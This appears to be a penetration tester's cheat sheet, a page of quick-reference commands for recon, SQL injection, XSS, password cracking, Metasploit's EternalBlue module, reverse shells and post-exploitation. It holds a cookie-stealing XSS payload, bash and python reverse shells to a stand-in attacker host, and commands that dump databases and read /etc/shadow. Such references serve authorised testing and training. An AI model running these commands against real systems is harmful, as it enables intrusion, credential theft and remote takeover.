Pentester Cheat Sheet
Reconnaissance, exploitation, and security testing quick reference.
Quick Reference
# Quick recon
nmap -sV -sC -oA initial_scan target
# Web enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
# Check for SQLi
sqlmap -u "http://target/page?id=1" --batchReconnaissance
Passive Recon
# DNS enumeration
dig target.com ANY
dig target.com MX
dig target.com NS
host -t ns target.com
# WHOIS
whois target.com
# Subdomain discovery
subfinder -d target.com
amass enum -d target.com
# Certificate transparency
curl "https://crt.sh/?q=%.target.com&output=json" | jq .Active Recon
# Port scan
nmap -sV -sC target
nmap -p- -T4 target
nmap -sU --top-ports 100 target
# Service version
nmap -sV --version-intensity 5 target
# OS detection
nmap -O target
# Vuln scan
nmap --script vuln targetWeb Application
Directory/File Enumeration
# Gobuster
gobuster dir -u http://target -w wordlist.txt -x php,txt,html
# Feroxbuster
feroxbuster -u http://target -w wordlist.txt
# ffuf
ffuf -u http://target/FUZZ -w wordlist.txtSQLi Testing
# SQLMap
sqlmap -u "http://target/page?id=1" --dbs
sqlmap -u "http://target/page?id=1" -D database --tables
sqlmap -u "http://target/page?id=1" -D database -T users --dump
# POST request
sqlmap -u "http://target/login" --data="user=admin&pass=test" --dbs
# Cookie-based
sqlmap -u "http://target/" --cookie="session=abc123" --dbsXSS Testing
// Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// Cookie stealing
<script>document.location='http://attacker/steal?c='+document.cookie</script>Password Attacks
Brute Force
# Hydra - SSH
hydra -l admin -P passwords.txt target ssh
# Hydra - HTTP POST
hydra -l admin -P passwords.txt target http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid"
# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --show hashes.txt
# Hashcat
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 1000 hashes.txt rockyou.txt # NTLMHash Identification
# Identify hash type
hash-identifier
hashid hash.txt
# Common formats
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex charsExploitation
Metasploit
# Start
msfconsole
# Search
search eternalblue
search type:exploit platform:windows
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploitShells
# Reverse shell (bash)
bash -i >& /dev/tcp/attacker/4444 0>&1
# Reverse shell (python)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
# Listener
nc -lvnp 4444
# Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'Post Exploitation
# Linux
whoami && id
cat /etc/passwd
cat /etc/shadow
find / -perm -4000 2>/dev/null # SUID
sudo -l
# Windows
whoami /priv
net user
net localgroup administratorsReporting Template
## Finding: [Vulnerability Name]
**Severity:** Critical/High/Medium/Low
**CVSS Score:** X.X
### Description
Brief description of the vulnerability.
### Impact
What an attacker could do.
### Proof of Concept
Steps to reproduce with evidence.
### Remediation
How to fix the issue. - pentesting
- penetration testing
- exploitation
- recon
- security testing